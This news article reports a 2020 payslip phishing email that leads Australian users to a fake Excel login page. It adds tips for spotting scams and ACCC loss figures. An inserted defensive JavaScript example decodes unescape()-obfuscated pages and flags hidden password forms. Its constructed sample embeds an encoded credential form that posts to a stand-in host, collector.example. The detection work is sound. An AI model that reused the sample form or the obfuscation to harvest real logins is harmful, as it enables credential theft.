'Do not click': New payslip scam steals Aussies’ bank details

Anastasia Santoreneos
A new payslip scam is threatening to steal Aussies' bank details. Source: Getty/MailGuard

Aussies have been warned to double check their payslips for the month of October after MailGuard intercepted a phishing email titled ‘PAYSLIP INVOICE OCTOBER 2020’.

The malicious email is designed to dupe recipients into clicking the “attached secured timesheet and invoice for October” to make sure they get paid.

“Please go through urgently and let me know if all is in order so we can proceed with payment,” the email states.

New payslip scam stealing Aussies' bank details. Source: MailGuard

The link looks like a Microsoft Excel attachment, but those who click the link will be redirected to a Microsoft Excel-branded login page with the background blurred.

“This is a phishing page hosted on Google Cloud, and uses JavaScript’s unescape function to obscure the HTML of the page. It is included most likely in an attempt to thwart automated link checking.”

Once users log in, the scammers “harvest” their details for later use.
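
For readers who run their own link or mail scanning, the obfuscation described above can be undone statically. The JavaScript below is an added example, not MailGuard's code or part of the original report: it decodes unescape()-wrapped markup and flags a page whose login form only appears after decoding. The sample page, the collector.example address and all function names are constructed for the illustration.

```javascript
// Added example: statically decode unescape()-wrapped markup so a link
// checker inspects the HTML the browser would render, not the wrapper.

// Decode %XX and %uXXXX the way legacy unescape() does, without calling it.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Find string literals passed to unescape(...) and decode them, repeating
// for nested layers up to maxDepth (a hypothetical limit for this example).
function revealHidden(html, maxDepth = 3) {
  const call = /unescape\(\s*(["'])((?:\\.|(?!\1).)*)\1\s*\)/g;
  const layers = [];
  let current = [html];
  for (let depth = 0; depth < maxDepth && current.length; depth++) {
    const next = [];
    for (const text of current) {
      for (const m of text.matchAll(call)) next.push(legacyUnescape(m[2]));
    }
    layers.push(...next);
    current = next;
  }
  return layers;
}

// Flag a page whose visible source has no password field but whose decoded
// layers do: the pattern described in the report.
function assessPage(html) {
  const hasPw = (t) => /<input[^>]+type\s*=\s*["']?password/i.test(t);
  const hidden = revealHidden(html);
  return {
    encodedBlocks: hidden.length,
    visiblePasswordField: hasPw(html),
    hiddenPasswordField: hidden.some(hasPw),
    suspicious: !hasPw(html) && hidden.some(hasPw),
  };
}

// Constructed sample page (not taken from the reported campaign).
const SAMPLE_FORM = '<form action="https://collector.example/"><input type="password" name="p"></form>';
const SAMPLE_PAGE = '<html><body><script>document.write(unescape("' +
  Array.from(SAMPLE_FORM, (c) => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('') +
  '"));</script></body></html>';

console.log(assessPage(SAMPLE_PAGE));
```

A scanner that only pattern-matches the raw source sees percent-encoded text and no form, which is why the decoding step has to come first.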

“In such cases, users are reminded of the importance of not accepting/clicking on documents from unknown senders, despite the organisation they purport to be from,” MailGuard stated.

While the email looks innocent at first glance, there are a few giveaways. For example, the email wasn’t addressed to a particular name, and there were some spelling errors.

I think I’ve received a scam email. What do I do?

If you’re not sure whether the email you have received is a scam or not, here are some telltale signs, according to the MailGuard blog.

  • The email is not addressed to you by name;

  • The email appears to be from a legitimate company, but uses poor English or omits personal details that a legitimate sender would include;

  • The email is from a business you weren’t expecting to hear from, or aren’t a customer of;

  • The email takes you to a landing page or website that isn’t the legitimate URL of the company the email is purporting to be sent from.

$268,440 lost to scams in September

Over the month of September, the ACCC received reports of 5,421 phishing scams, with Aussies losing $268,440 to scams.

Interestingly, those aged between 35 and 44 lost the most money to scams ($87,000) across September - a whopping $20,000 more than those over the age of 65.

“Phishing attacks can appear very trustworthy, and attackers often disguise them as emails from a bank or messages from someone the user knows personally,” malware analyst at Avast, Alexej Savcin, said.

“People should be critical of the emails they receive, and if they find anything suspicious, they should never click on any link or download attachments.”
